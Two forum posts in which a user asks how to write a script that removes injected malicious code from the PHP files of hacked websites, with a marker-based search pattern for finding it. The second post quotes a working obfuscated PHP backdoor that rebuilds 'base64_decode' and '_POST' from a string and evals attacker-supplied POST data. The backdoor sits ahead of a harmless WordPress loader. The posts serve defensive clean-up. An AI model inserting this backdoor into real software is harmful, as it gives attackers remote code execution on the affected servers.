Jump to content

Lunastone

Members
  • Posts

    2
  • Joined

  • Last visited

Everything posted by Lunastone

  1. I know how to determine and find all the malicious code within all the files of a domain however, I get about eight different hacked domains daily so i need something to speed up the process. Which language do you recommend i use to find the code as explained above? And could you point me into the right direction to identify the start (<?php), content (PCT4BA6ODSE) and end (?>) of the malicious code?
  2. I'm trying to automate the clean-up of hacked websites but unfortunately I have great ideas but not enough knowledge to create the solution that i have written down. I want to create a script which will search the following code <?php*.*PCT4BA6ODSE*.*?> within all .php files of a folder including sub folders. In this code the symbol *.* can be really anything for example; File: <?php $sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);if (isset(${$s20}['nce63e1'])) {eval($s21(${$s20}['nce63e1']));}?><?php /** * @author Tarchini Maurizio * @copyright 2011 */ $wp_load = dirname(dirname(__FILE__)); for($i=0; $i<10; $i++) { if(file_exists($wp_load . '/wp-load.php')) { require_once "$wp_load/wp-load.php"; break; } else { $wp_load = dirname($wp_load); } } ?> Result after running the script: <?php /** * @author Tarchini Maurizio * @copyright 2011 */ $wp_load = dirname(dirname(__FILE__)); for($i=0; $i<10; $i++) { if(file_exists($wp_load . '/wp-load.php')) { require_once "$wp_load/wp-load.php"; break; } else { $wp_load = dirname($wp_load); } } ?>
×
×
  • Create New...